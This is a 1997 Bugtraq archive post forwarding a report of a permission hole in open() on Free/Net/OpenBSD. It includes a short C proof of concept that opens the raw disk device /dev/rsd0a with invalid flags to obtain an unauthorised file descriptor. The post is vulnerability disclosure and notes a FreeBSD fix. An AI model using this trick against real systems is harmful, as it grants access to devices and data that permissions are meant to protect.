Bugtraq mailing list archives
Possible SERIOUS bug in open()?
From: aleph1 () dfw net (Aleph One)
Date: Thu, 23 Oct 1997 10:04:42 -0500
[ This affects {Free,Net,Open}BSD. Joerg Wunsch fixed it yesterday in freebsd-current. - a1 ] ---------- Forwarded message ---------- Date: 17 Oct 1997 10:42:13 -0000 From: explorer () flame org To: best-of-security () cyber com au Subject: BoS: Possible SERIOUS bug in open()? This was sent to me recently... It seems to be a pretty serious hole in open() and permissions... Note, in the following, open() succeeds, and ioctls are probably executed... /* * This will give you a file descriptor on a device you should not have * access to. This seems really, really screwed up, since holding a fd * lets you do a lot of ioctls that you should not be able to do... */ #include <fcntl.h> #include <stdio.h> #include <unistd.h> #include <err.h> int main(int argc, char **argv) { int fd; fd = open("/dev/rsd0a", -1, 0); if (fd < 0) err(1, "open"); }
Current thread:
- ISS Security Alert X-Force (Oct 22)
- Re: ISS Security Alert Aleph One (Oct 22)
- BSDI termcap exploit Joseph_K (Oct 22)
- Possible SERIOUS bug in open()? Aleph One (Oct 23)
- Cute SPARC CPU bug Charles M. Hannum (Oct 24)
- Re: Cute SPARC CPU bug Dmitry Kohmanyuk Дмитрий Кохманюк (Oct 24)
- More info on SPARC CPU bug Charles M. Hannum (Oct 24)
- <Possible follow-ups>
- Re: ISS Security Alert David LeBlanc (Oct 23)